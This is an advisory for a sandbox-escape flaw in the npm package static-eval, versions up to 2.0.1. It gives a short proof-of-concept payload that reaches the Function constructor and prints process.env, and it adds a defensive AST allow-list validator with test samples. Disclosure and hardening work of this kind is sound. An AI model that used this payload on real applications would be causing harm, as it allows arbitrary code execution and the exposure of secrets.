Description
Sandbox Breakout / Arbitrary Code Execution in static-eval
Versions of static-eval prior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.
Proof of concept
// Proof of concept from the advisory: the expression below is parsed with esprima and
// handed to static-eval, which (before 2.0.2) lets it reach the global Function constructor.
var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = process.argv[2]; // unused in this PoC; kept as in the original
// Payload: a destructured parameter yields a function's constructor (Function),
// which then builds and runs a new function from a string.
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()';
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));
Recommendation
Upgrade to version 2.0.2 or later.
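Upgrading is the fix. As defense in depth, an application that must evaluate user-supplied expressions can also refuse the AST shapes the advisory's payload relies on before the tree ever reaches the evaluator. The following is an added example, not code from the advisory or from the static-eval project: an allow-list walk over an ESTree-shaped AST (the shape esprima produces) that rejects function expressions, calls, and any member access naming `constructor` or another prototype-walking property. The sample ASTs are constructed by hand so the file runs without esprima or static-eval installed; `guardedEvaluate` is a hypothetical wrapper that accepts whatever evaluator function the application uses.

```javascript
'use strict';

// Added example (not the advisory's or static-eval's code): validate an ESTree AST
// against an allow-list before passing it to an expression evaluator.

// Node types a pure data expression needs. Widen per application, deliberately.
const ALLOWED_TYPES = new Set([
  'Literal', 'Identifier', 'ArrayExpression', 'ObjectExpression', 'Property',
  'UnaryExpression', 'BinaryExpression', 'LogicalExpression',
  'ConditionalExpression', 'MemberExpression',
]);

// Property names that lead from a plain value back into the runtime.
const FORBIDDEN_PROPS = new Set(['constructor', '__proto__', 'prototype']);

// Statically determine the accessed property name, or null when it is dynamic.
function memberPropertyName(node) {
  if (!node.computed) return node.property.name;
  return node.property.type === 'Literal' ? String(node.property.value) : null;
}

// True only if every node is allow-listed and no member access can reach a
// forbidden property. Dynamic computed keys such as x[k] are rejected as unknowable.
function isSafeExpression(node) {
  if (Array.isArray(node)) return node.every(isSafeExpression);
  if (node === null || typeof node !== 'object') return true; // scalar field (name, value, operator)
  if (typeof node.type !== 'string') return true;             // loc/range metadata, not an AST node
  if (!ALLOWED_TYPES.has(node.type)) return false;
  if (node.type === 'MemberExpression') {
    const name = memberPropertyName(node);
    if (name === null || FORBIDDEN_PROPS.has(name)) return false;
  }
  for (const key of Object.keys(node)) {
    if (key === 'type') continue;
    if (!isSafeExpression(node[key])) return false;
  }
  return true;
}

// Hypothetical gate: run the allow-list, then the application's evaluator
// (in practice static-eval's `evaluate`). Throws instead of evaluating rejected input.
function guardedEvaluate(ast, evaluateFn, vars) {
  if (!isSafeExpression(ast)) throw new Error('expression rejected by allow-list');
  return evaluateFn(ast, vars);
}

// Constructed sample ASTs in ESTree shape.
// a + b * 2
const BENIGN_AST = {
  type: 'BinaryExpression', operator: '+',
  left: { type: 'Identifier', name: 'a' },
  right: {
    type: 'BinaryExpression', operator: '*',
    left: { type: 'Identifier', name: 'b' },
    right: { type: 'Literal', value: 2, raw: '2' },
  },
};
// x.constructor  (the step the advisory's payload uses to reach Function)
const DOT_CONSTRUCTOR_AST = {
  type: 'MemberExpression', computed: false,
  object: { type: 'Identifier', name: 'x' },
  property: { type: 'Identifier', name: 'constructor' },
};
// x["constructor"]  (same access through a computed literal key)
const COMPUTED_CONSTRUCTOR_AST = {
  type: 'MemberExpression', computed: true,
  object: { type: 'Identifier', name: 'x' },
  property: { type: 'Literal', value: 'constructor', raw: '"constructor"' },
};
// (function (y) { return y; })(1)  (the outer call-and-function shape of the payload)
const IIFE_AST = {
  type: 'CallExpression',
  callee: {
    type: 'FunctionExpression', id: null,
    params: [{ type: 'Identifier', name: 'y' }],
    body: { type: 'BlockStatement', body: [
      { type: 'ReturnStatement', argument: { type: 'Identifier', name: 'y' } },
    ] },
  },
  arguments: [{ type: 'Literal', value: 1, raw: '1' }],
};

// Classify each sample; returns a label -> 'accepted' | 'rejected' map.
function summarize() {
  const samples = { BENIGN_AST, DOT_CONSTRUCTOR_AST, COMPUTED_CONSTRUCTOR_AST, IIFE_AST };
  const out = {};
  for (const [label, ast] of Object.entries(samples)) {
    out[label] = isSafeExpression(ast) ? 'accepted' : 'rejected';
  }
  return out;
}

console.log(summarize());
```

With esprima available, the parsed tree is passed as `guardedEvaluate(parse(src).body[0].expression, require('static-eval'), vars)`. The allow-list is intentionally narrow (no calls at all); an application that exposes helper functions through `vars` would have to admit `CallExpression` and then decide, per callee, what may be called. None of this replaces the version upgrade above, which removes the underlying path to the Function constructor.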
Packages
Name: static-eval (npm)
Affected versions: <= 2.0.1
Fixed version: 2.0.2
CVSS3 score: 7.3 High
Weaknesses: CWE-94